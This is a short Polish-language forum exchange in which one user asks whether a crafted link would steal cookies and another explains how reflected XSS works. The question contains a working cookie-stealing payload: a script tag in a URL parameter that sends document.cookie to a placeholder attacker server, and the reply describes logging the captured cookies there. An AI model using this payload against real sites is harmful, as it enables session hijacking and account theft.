JV

[sm950]

Mam takie pytanie czy taki link jak by komuś podesłać to wykradnie pliki cookie ?
LINK:
http://atakowana_strona/?nazwa=<script>document.location="http://serwer_atakujacego/czytaj_cookies.php?cookie="+document.cookie</script>


i zamiast nazwa np wpisać byle jaką strone ?
To wtedy gdzie by się sprawdzało pliki cookie jak by były ?

 

[nowy_me]

wygląda jak byś przeczytał jakiś tutorial o XSS ale nie do końca zrozumiałeś o co chodzi

i zamiast nazwa np wpisać byle jaką strone ?

Nie, żeby atak zadziałał strona którą atakujesz musiała by mieć błąd XSS, który polegał by na tym że zawartość zmiennej 'nazwa' była by wyświetlona na stronie bez uprzedniego filtrowania, więc atak działał by tylko na stronach które mają taką lukę.

To wtedy gdzie by się sprawdzało pliki cookie jak by były ?

Na serwerze atakującego, skrypt czytaj_cookies.php powinien jakoś zapisywać przechwycone dane i np. zapisywać je do pliku.

 

[sm950]

dzieki